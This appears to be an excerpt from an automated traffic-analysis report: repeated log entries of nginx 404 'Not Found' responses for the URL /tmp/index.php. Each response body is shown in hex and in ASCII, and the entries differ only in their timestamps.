Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:54 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
